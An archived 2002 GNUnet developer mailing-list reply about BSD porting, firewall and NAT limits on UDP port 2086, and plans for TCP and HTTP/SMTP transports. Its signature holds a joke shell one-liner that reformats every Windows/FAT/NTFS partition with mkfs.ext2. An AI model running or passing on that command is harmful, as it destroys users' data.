[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[GNUnet-developers] Re: Round 1

From: Christian Grothoff
Subject: [GNUnet-developers] Re: Round 1
Date: Thu, 14 Mar 2002 05:32:59 -0500

I've cc:ed this to gnunet-developers as I think it is of general intrest :-).

On Thursday 14 March 2002 05:20 am, you wrote:
> > How far do we have to go until you think it will run under FreeBSD? (or
> > does it already?) [I'm not talking only about gnunetd but also about the
> > textui-tools here.]
> It's done. Everything compiles and appears to work fine on my BSD boxes.
> Question though, does gnunet work behind a firewall? I am somewhat unable
> to test it because I'm using a private IP address, and incoming UDP
> requests are getting dropped by my firewall. I can obviously put this on a
> BSD box that isn't behind a firewall, but I'm curious. If one of the goals
> of GnuNet is to be an anti-censorship package, we will probably want to
> hack support into this to circumvent firewalls. This can be done in several
> different ways, and if there's interest once the BSD stuff is done I can
> work on it.

Several answers. First of all, the current version can not work if UDP/2086 
is not open. Which is obvious. Firewalling TCP/2086 is recommended, though, 
as it is the trusted local port for queries. We may want to do some checks in 
the tcpserver-code to ensure requests are comming only from localhost or 
other trusted (by the definiton of the user in the config file) interfaces. 
Anyway, that's off-topic.

In the future, I would definitely like to support other means. The first 
would probably be to be able to optionally use TCP. The reason is that 
currently a simple NAT box is sufficient to block us. Most NAT boxes are 
working with TCP, but with UDP they usually don't.

Once that is done, we may consider adding some modules for 'strange' 
transport mechanisms for machines / networks that are highly policed and 
would not let arbitrary TCP or UDP traffic through. An extention that would 
allow us to 'abuse' SMTP / HTTP / etc. would be nice (but that's *very* long 

For both, the TCP and the higher-level tunnels I would like to have some 
abstraction layer first. We'll also need a new HELO protocol for those in 
order to communicate the use of a different transport protocol. 

> Oh, I'd also like to fix the inconsistencies of the
> .gnunet/.gnet/gnunet stuff. I'd like to have everything, including the
> config file be in ~/GNUnet. That way there's no 2 directories, everything
> is in one place, and users don't have to worry about finding the directory.
> Let me know what you think.

Fine with me, go ahead. And congratulations on the BSD ports. Should we list 
OpenBSD, FreeBSD and NetBSD or do you want to exclude any of these until you 
could do some more testing? [You can of course update the webpage yourself if 
you want (doc/WWW/index.html; doc/ 

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|   address@hidden|
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"

reply via email to

[Prev in Thread] Current Thread [Next in Thread]